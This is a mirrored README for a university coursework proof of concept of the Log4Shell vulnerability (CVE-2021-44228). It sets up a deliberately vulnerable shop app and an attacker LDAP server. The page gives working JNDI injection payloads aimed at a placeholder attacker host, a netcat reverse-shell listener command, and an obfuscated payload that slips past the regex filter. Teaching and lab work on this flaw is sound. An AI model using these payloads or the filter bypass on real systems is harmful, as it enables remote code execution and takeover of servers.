关联漏洞
描述
Proof of Concept (PoC) for the Log4Shell vulnerability (CVE-2021-44228), developed as part of the coursework for the curricular unit TPAS in the Master's degree in Information Security at FCUP.
介绍
# TPAS Log4Shell PoC
This repository contains a Proof of Concept (PoC) for the Log4Shell vulnerability (CVE-2021-44228), developed as part of the coursework for the curricular unit TPAS in the Master's degree in Information Security at FCUP.
It features:
- A React SPA frontend that simulates a generic e-commerce website with basic features such as browsing products and view basic details such as description, price, rating, etc.., provided via the dummy json api https://dummyjson.com/docs/products
- A Spring Boot REST API backend that uses a vulnerable version of Log4j 2.14.
- A bash script that sets up most of the attacker side of things needed to exploit Log4Shell.
To run this stack you need to:
- On the target host:
- Install docker
- Replace the <target_ip> on the NEXT_PUBLIC_BACKEND_URL env var on docker-compose.yaml
- Run docker-compose up
- On the attacker host:
- Install java, python and maven
- Open the required ports, "./init.sh --help" to see the ports and what the script does
- Run the script init.sh
- Run a netcat listener, nc -lvnp <port>
Once everything is running:
Place this payload on the search bar (URL encoded since it will be on a GET query param):
```
%24%7Bjndi%3Aldap%3A%2F%2F<attacker_host_ip>%3A<ldap_port>%2FExploit%7D
```
Or place this payload on the headers of a request (you can use burp suite to intercept a request and tamper it):
```
${jndi:ldap://<attacker_host_ip>:<ldap_port>/Exploit}
```
On the website, there is an icon next to the user's name that allows toggling between sanitizing the logged string using the regular expression \\$\\{jndi:.*?} or not. By default, sanitization is disabled, represented by a red demon icon. When sanitization is enabled, the icon changes to a green smiley face.
This feature can be used as a way of simulating a WAF bypass, you can add more regular expressions on the backend's LoggerManager.java class.
Here's a payload that will not be matched by the current regex:
```
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://<attacker_host_ip>:<ldap_port>/Exploit}
```
文件快照
[4.0K] /data/pocs/96cd38d01f57960b9518530ec7b5b3414d36357b
├── [4.0K] backend
│ ├── [ 293] Dockerfile
│ ├── [ 10K] mvnw
│ ├── [6.8K] mvnw.cmd
│ ├── [1.8K] pom.xml
│ ├── [ 326] README.md
│ └── [4.0K] src
│ └── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] tpas
│ │ └── [4.0K] poc
│ │ └── [4.0K] log4shell
│ │ ├── [4.0K] components
│ │ │ ├── [1.1K] LoggerManager.java
│ │ │ └── [4.0K] LoggingWebFilter.java
│ │ ├── [4.0K] configs
│ │ │ └── [ 667] CorsConfig.java
│ │ ├── [4.0K] controllers
│ │ │ ├── [1.2K] LoggerController.java
│ │ │ └── [1.7K] ProductController.java
│ │ ├── [4.0K] dtos
│ │ │ ├── [ 353] Dimensions.java
│ │ │ ├── [ 444] Meta.java
│ │ │ ├── [2.0K] Product.java
│ │ │ ├── [ 320] ProductsDTO.java
│ │ │ └── [ 534] Review.java
│ │ ├── [ 782] Entrypoint.java
│ │ └── [4.0K] services
│ │ └── [2.4K] ProductService.java
│ └── [4.0K] resources
│ ├── [ 104] application.properties
│ └── [ 623] log4j2.xml
├── [ 527] docker-compose.yaml
├── [4.0K] frontend
│ ├── [ 423] components.json
│ ├── [ 352] Dockerfile
│ ├── [ 471] next.config.mjs
│ ├── [ 175] nginx.conf
│ ├── [ 918] package.json
│ ├── [183K] package-lock.json
│ ├── [ 135] postcss.config.mjs
│ ├── [4.0K] public
│ │ ├── [ 25K] favicon.ico
│ │ └── [ 376] mat-icon-search.svg
│ ├── [ 311] README.md
│ ├── [4.0K] src
│ │ ├── [4.0K] components
│ │ │ ├── [4.0K] layout
│ │ │ │ ├── [1.5K] Header.tsx
│ │ │ │ └── [2.0K] Navbar.tsx
│ │ │ ├── [ 572] Layout.tsx
│ │ │ ├── [4.0K] product
│ │ │ │ ├── [2.7K] Categories.ts
│ │ │ │ ├── [3.7K] ProductCatalog.tsx
│ │ │ │ └── [5.6K] ProductModal.tsx
│ │ │ └── [4.0K] ui
│ │ │ ├── [1.1K] badge.tsx
│ │ │ ├── [1.0K] blurEffectImage.tsx
│ │ │ ├── [1.8K] button.tsx
│ │ │ ├── [1.8K] card.tsx
│ │ │ └── [1.1K] expandableSearch.tsx
│ │ ├── [4.0K] hooks
│ │ │ ├── [2.5K] productsResponseExample.json
│ │ │ ├── [2.2K] useExploitMode.tsx
│ │ │ └── [2.6K] useProducts.tsx
│ │ ├── [4.0K] interfaces
│ │ │ └── [ 872] Product.ts
│ │ ├── [4.0K] lib
│ │ │ └── [ 166] utils.ts
│ │ ├── [4.0K] pages
│ │ │ ├── [ 181] _app.tsx
│ │ │ ├── [ 257] _document.tsx
│ │ │ └── [ 234] index.tsx
│ │ ├── [4.0K] stores
│ │ │ └── [ 786] useProductStore.ts
│ │ └── [4.0K] styles
│ │ └── [2.5K] globals.css
│ ├── [1.6K] tailwind.config.ts
│ └── [ 596] tsconfig.json
├── [3.6K] init.sh
├── [4.0K] jndi-classes
├── [4.0K] ldap-ref-server
│ ├── [1.4K] pom.xml
│ ├── [ 366] README.md
│ └── [4.0K] src
│ └── [4.0K] main
│ └── [4.0K] java
│ └── [4.0K] tpas
│ └── [4.0K] poc
│ └── [4.0K] log4shell
│ └── [4.3K] LDAPRefServer.java
├── [1.0K] LICENSE
└── [2.1K] README.md
34 directories, 59 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。